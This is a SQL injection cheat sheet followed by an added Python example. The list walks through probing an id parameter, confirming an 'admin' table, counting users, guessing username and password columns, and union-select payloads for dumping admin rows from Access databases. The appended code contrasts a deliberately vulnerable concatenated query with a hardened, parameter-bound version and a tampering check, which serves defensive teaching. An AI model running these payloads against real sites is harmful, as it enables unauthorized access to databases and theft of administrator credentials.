1. Confirm that an injection point exists:
' produces an error
and 1=1 returns the normal page
and 1=2 returns an error (or a different page)
2. Check whether the table exists:
and 0<>(select count(*) from admin)
3. Determine the number of users:
and n<(select count(*) from admin)
4. Guess the column names:
Put the column name you want to test inside the parentheses of len( ); a normal page means the column exists.
and 1=(select count(*) from admin where len(<username column, e.g. name>)>0)
and 1=(select count(*) from admin where len(<password column, e.g. password>)>0)
5. Determine the id value:
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union also works fine against Access)
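Added example (not from the original list) showing why the step 1 probes change the result of a query built by string concatenation, and how type validation plus parameter binding removes the injection point. The table, rows and function names are constructed for the demonstration; it uses only Python's standard sqlite3 module.

```python
import sqlite3


def make_db():
    # Constructed in-memory sample data; stands in for the application's table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first"), (2, "second")])
    return conn


def vulnerable_lookup(conn, user_id):
    # The untrusted value is pasted into the SQL text, so an appended
    # "and 1=1" / "and 1=2" becomes part of the WHERE clause and changes
    # which rows come back. That difference is what step 1 above observes.
    sql = "SELECT title FROM news WHERE id=" + user_id
    return [row[0] for row in conn.execute(sql)]


def is_suspicious_param(user_id):
    # Defensive check for logging/alerting: an id that is not a plain
    # integer is a sign of tampering or of a probe like the ones above.
    return not user_id.strip().lstrip("-").isdigit()


def hardened_lookup(conn, user_id):
    # Reject anything that is not an integer, then bind the value as a
    # parameter. The driver sends it as data, never as SQL syntax, so no
    # appended condition can alter the query's logic.
    if is_suspicious_param(user_id):
        return []
    id_value = int(user_id)
    return [row[0] for row in
            conn.execute("SELECT title FROM news WHERE id=?", (id_value,))]
```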